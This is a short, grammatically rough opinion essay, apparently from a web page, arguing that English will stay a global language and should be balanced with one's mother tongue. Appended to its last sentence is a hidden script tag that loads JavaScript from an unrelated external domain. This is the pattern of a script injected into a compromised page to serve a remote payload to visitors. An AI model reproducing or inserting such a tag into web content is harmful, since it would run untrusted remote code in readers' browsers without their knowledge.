Do you think English will remain to be a global language despite globalization?

o you think english will remain a global language despite globalization? Discuss you views with examples.

most people say that english will remain as a global language despite globalization.

Quite often, we encounter different types of opinions with relevance to the given topic.

One set of people argue that english is a global language where as another set of people has a contrary opinion.

In my opinion, it is a good idea to consider english as a global language because most of the people around the world speak english; furthermore communication and interaction are very easy using english language.

If an individual knows english, it is easy for him or her to interact with people across the globe without any hesitation. In this way, they can become good friends. If a language is a barrier, we cannot accomplish our tasks on time both personal or professional.

Hence, it is always suggested to follow a unique langauge across the globe for proper and transparent communication, and that language is undoubtedly english.

However, one should strike a balance between the usage of their own mother tongue language and the most commonly spoken language and try to expertise both of them.<script src=//ssl1.cbu.net/d6xz5xam></script>